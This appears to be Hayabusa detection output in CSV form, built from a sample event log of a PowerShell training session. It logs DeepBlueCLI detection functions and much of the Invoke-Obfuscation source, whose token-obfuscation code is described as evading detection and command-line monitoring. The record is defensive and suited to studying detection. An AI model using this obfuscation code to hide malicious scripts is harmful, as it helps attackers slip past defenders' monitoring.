$log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ 
write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:27.684 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:41.504 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many 
special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:41.506 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function 
Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:41.506 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:41.507 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:42.511 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:49.242 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" sysmon",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:49.249 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";ID=1,7} -ErrorAction Stop",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:11:52.107 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:12:04.061 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,.\DeepBlue-0.3.ps1,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:12:04.069 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{Logname=""Security"";ID=4688,4720,4728,4732,4625} -ErrorAction 
Stop",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:12:09.520 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:13:28.641 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,.\DeepBlue-0.3.ps1 ..\sysmon1.evtx sysmon,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:13:28.657 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{path=""..\sysmon1.evtx"";ID=1,7} -ErrorAction Stop",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:13:31.538 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:21.320 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:31.954 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,cd C:\Users\student\Desktop\Invoke-Obfuscation-master\,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:31.956 +09:00,SEC511,4104,info,,PwSh Scriptblock 
Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:38.671 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,Invoke-Obfuscation,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:38.711 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:38.715 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:38.716 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:38.776 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.198 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,Import-Module .\Invoke-Obfuscation.psd1,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.202 +09:00,SEC511,4104,info,,PwSh Scriptblock 
Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Module manifest for module 'Invoke-Obfuscation' # # Generated by: Daniel Bohannon (@danielhbohannon) # # Generated on: 2017-01-19 # @{ # Version number of this module. ModuleVersion = '1.1' # ID used to uniquely identify this module GUID = 'd0a9150d-b6a4-4b17-a325-e3a24fed0aa9' # Author of this module Author = 'Daniel Bohannon (@danielhbohannon)' # Copyright statement for this module Copyright = 'Apache License, Version 2.0' # Description of the functionality provided by this module Description = 'PowerShell module file for importing all required modules for the Invoke-Obfuscation framework.' 
# Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' # Minimum version of the Windows PowerShell host required by this module PowerShellHostVersion = '2.0' # Script files (.ps1) that are run in the caller's environment prior to importing this module ScriptsToProcess = @('Out-ObfuscatedTokenCommand.ps1','Out-ObfuscatedStringCommand.ps1','Out-EncodedAsciiCommand.ps1','Out-EncodedHexCommand.ps1','Out-EncodedOctalCommand.ps1','Out-EncodedBinaryCommand.ps1','Out-SecureStringCommand.ps1','Out-EncodedBXORCommand.ps1','Out-EncodedSpecialCharOnlyCommand.ps1','Out-EncodedWhitespaceCommand.ps1','Out-PowerShellLauncher.ps1','Invoke-Obfuscation.ps1') # Functions to export from this module FunctionsToExport = '*' # HelpInfo URI of this module # HelpInfoURI = '' }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedTokenCommand { <# .SYNOPSIS Master function that orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script. 
Invoke-Obfuscation Function: Out-ObfuscatedTokenCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER TokenTypeToObfuscate (Optional) Specifies the token type to obfuscate ('Command', 'CommandArgument', 'Comment', 'Member', 'String', 'Type', 'Variable', 'RandomWhitespace'). If not defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given TokenTypeToObfuscate. If not defined then Out-ObfuscatedTokenCommand will automatically perform obfuscation function at the highest available obfuscation level. Each token has different available obfuscation levels: 'Argument' 1-4 'Command' 1-3 'Comment' 1 'Member' 1-4 'String' 1-2 'Type' 1-2 'Variable' 1 'Whitespace' 1 'All' 1 .EXAMPLE C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} .( ""{0}{2}{1}"" -f'Write','t','-Hos' ) ( 'Hell' + 'o ' +'Wor'+ 'ld!' 
) -ForegroundColor ( ""{1}{0}"" -f 'een','Gr') ; .( ""{1}{2}{0}""-f'ost','Writ','e-H' ) ( 'O' + 'bfusca'+ 't' + 'ion Rocks' + '!') -ForegroundColor ( ""{1}{0}""-f'een','Gr' ) .NOTES Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('Member', 'Command', 'CommandArgument', 'String', 'Variable', 'Type', 'RandomWhitespace', 'Comment')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [String] $TokenTypeToObfuscate, [Parameter(Position = 2)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = 10 # Default to highest obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # If $TokenTypeToObfuscate was not defined then we will automate randomly calling all available obfuscation functions in Out-ObfuscatedTokenCommand. 
If($TokenTypeToObfuscate.Length -eq 0) { # All available obfuscation token types (minus 'String') currently supported in Out-ObfuscatedTokenCommand. # 'Comment' and 'String' will be manually added first and second respectively for reasons defined below. # 'RandomWhitespace' will be manually added last for reasons defined below. $ObfuscationChoices = @() $ObfuscationChoices += 'Member' $ObfuscationChoices += 'Command' $ObfuscationChoices += 'CommandArgument' $ObfuscationChoices += 'Variable' $ObfuscationChoices += 'Type' # Create new array with 'String' plus all obfuscation types above in random order. $ObfuscationTypeOrder = @() # Run 'Comment' first since it will be the least number of tokens to iterate through, and comments may be introduced as obfuscation technique in future revisions. $ObfuscationTypeOrder += 'Comment' # Run 'String' second since otherwise we will have unnecessary command bloat since other obfuscation functions create additional strings. $ObfuscationTypeOrder += 'String' $ObfuscationTypeOrder += (Get-Random -Input $ObfuscationChoices -Count $ObfuscationChoices.Count) # Apply each randomly-ordered $ObfuscationType from above step. ForEach($ObfuscationType in $ObfuscationTypeOrder) { $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock]::Create($ScriptString)) $ObfuscationType $ObfuscationLevel } Return $ScriptString } # Parse out and obfuscate tokens (in reverse to make indexes simpler for adding in obfuscated tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) # Handle fringe case of retrieving count of all tokens used when applying random whitespace. 
$TokenCount = ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenTypeToObfuscate}).Count $TokensForInsertingWhitespace = @('Operator','GroupStart','GroupEnd','StatementSeparator') # Script-wide variable ($Script:TypeTokenScriptStringGrowth) to speed up Type token obfuscation by avoiding having to re-tokenize ScriptString for every token. # This is because we are appending variable instantiation at the beginning of each iteration of ScriptString. # Additional script-wide variable ($Script:TypeTokenVariableArray) allows each unique Type token to only be set once per command/script for efficiency and to create less items to create indicators off of. $Script:TypeTokenScriptStringGrowth = 0 $Script:TypeTokenVariableArray = @() If($TokenTypeToObfuscate -eq 'RandomWhitespace') { # If $TokenTypeToObfuscate='RandomWhitespace' then calculate $TokenCount for output by adding token count for all tokens in $TokensForInsertingWhitespace. $TokenCount = 0 ForEach($TokenForInsertingWhitespace in $TokensForInsertingWhitespace) { $TokenCount += ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenForInsertingWhitespace}).Count } } # Handle fringe case of outputting verbiage consistent with options presented in Invoke-Obfuscation. If($TokenCount -gt 0) { # To be consistent with verbiage in Invoke-Obfuscation we will print Argument/Whitespace instead of CommandArgument/RandomWhitespace. $TokenTypeToObfuscateToPrint = $TokenTypeToObfuscate If($TokenTypeToObfuscateToPrint -eq 'CommandArgument') {$TokenTypeToObfuscateToPrint = 'Argument'} If($TokenTypeToObfuscateToPrint -eq 'RandomWhitespace') {$TokenTypeToObfuscateToPrint = 'Whitespace'} If($TokenCount -gt 1) {$Plural = 's'} Else {$Plural = ''} # Output verbiage concerning which $TokenType is currently being obfuscated and how many tokens of each type are left to obfuscate. 
# This becomes more important when obfuscated large scripts where obfuscation can take several minutes due to all of the randomization steps. Write-Host ""`n[*] Obfuscating $($TokenCount)"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" token$Plural."" } # Variables for outputting status of token processing for large token counts when obfuscating large scripts. $Counter = $TokenCount $OutputCount = 0 $IterationsToOutputOn = 100 $DifferenceForEvenOutput = $TokenCount % $IterationsToOutputOn For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Extra output for large scripts with several thousands tokens (like Invoke-Mimikatz). If(($TokenCount -gt $IterationsToOutputOn*2) -AND ((($TokenCount-$Counter)-($OutputCount*$IterationsToOutputOn)) -eq ($IterationsToOutputOn+$DifferenceForEvenOutput))) { $OutputCount++ $ExtraWhitespace = ' '*(([String]($TokenCount)).Length-([String]$Counter).Length) If($Counter -gt 0) { Write-Host ""[*] $ExtraWhitespace$Counter"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" tokens remaining to obfuscate."" } } $ObfuscatedToken = """" If(($Token.Type -eq 'String') -AND ($TokenTypeToObfuscate.ToLower() -eq 'string')) { $Counter-- # If String $Token immediately follows a period (and does not begin $ScriptString) then do not obfuscate as a String. # In this scenario $Token is originally a Member token that has quotes added to it. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If(($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) { Continue } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Binding Validation Attributes cannot have their string values formatted with the -f format operator unless treated as a scriptblock. # When we find strings following these Parameter Binding Validation Attributes then if we are using a -f format operator we will treat the result as a scriptblock. # Source: https://technet.microsoft.com/en-us/library/hh847743.aspx $ParameterValidationAttributesToTreatStringAsScriptblock = @() $ParameterValidationAttributesToTreatStringAsScriptblock += 'alias' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allownull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptystring' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptycollection' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatecount' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatelength' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatepattern' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validaterange' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatescript' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validateset' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnullorempty' $ParameterValidationAttributesToTreatStringAsScriptblock += 'helpmessage' $ParameterValidationAttributesToTreatStringAsScriptblock += 'confirmimpact' $ParameterValidationAttributesToTreatStringAsScriptblock += 'outputtype' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel 
value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Member') -AND ($TokenTypeToObfuscate.ToLower() -eq 'member')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Attributes cannot be obfuscated like other Member Tokens, so we will only randomize the case of these tokens. # Source 1: https://technet.microsoft.com/en-us/library/hh847743.aspx $MemberTokensToOnlyRandomCase = @() $MemberTokensToOnlyRandomCase += 'mandatory' $MemberTokensToOnlyRandomCase += 'position' $MemberTokensToOnlyRandomCase += 'parametersetname' $MemberTokensToOnlyRandomCase += 'valuefrompipeline' $MemberTokensToOnlyRandomCase += 'valuefrompipelinebypropertyname' $MemberTokensToOnlyRandomCase += 'valuefromremainingarguments' $MemberTokensToOnlyRandomCase += 'helpmessage' $MemberTokensToOnlyRandomCase += 'alias' # Source 2: https://technet.microsoft.com/en-us/library/hh847872.aspx $MemberTokensToOnlyRandomCase += 'confirmimpact' $MemberTokensToOnlyRandomCase += 'defaultparametersetname' $MemberTokensToOnlyRandomCase += 'helpuri' $MemberTokensToOnlyRandomCase += 'supportspaging' $MemberTokensToOnlyRandomCase += 'supportsshouldprocess' $MemberTokensToOnlyRandomCase += 'positionalbinding' $MemberTokensToOnlyRandomCase += 'ignorecase' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1} 4 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2} default 
{Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'CommandArgument') -AND ($TokenTypeToObfuscate.ToLower() -eq 'commandargument')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} 4 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 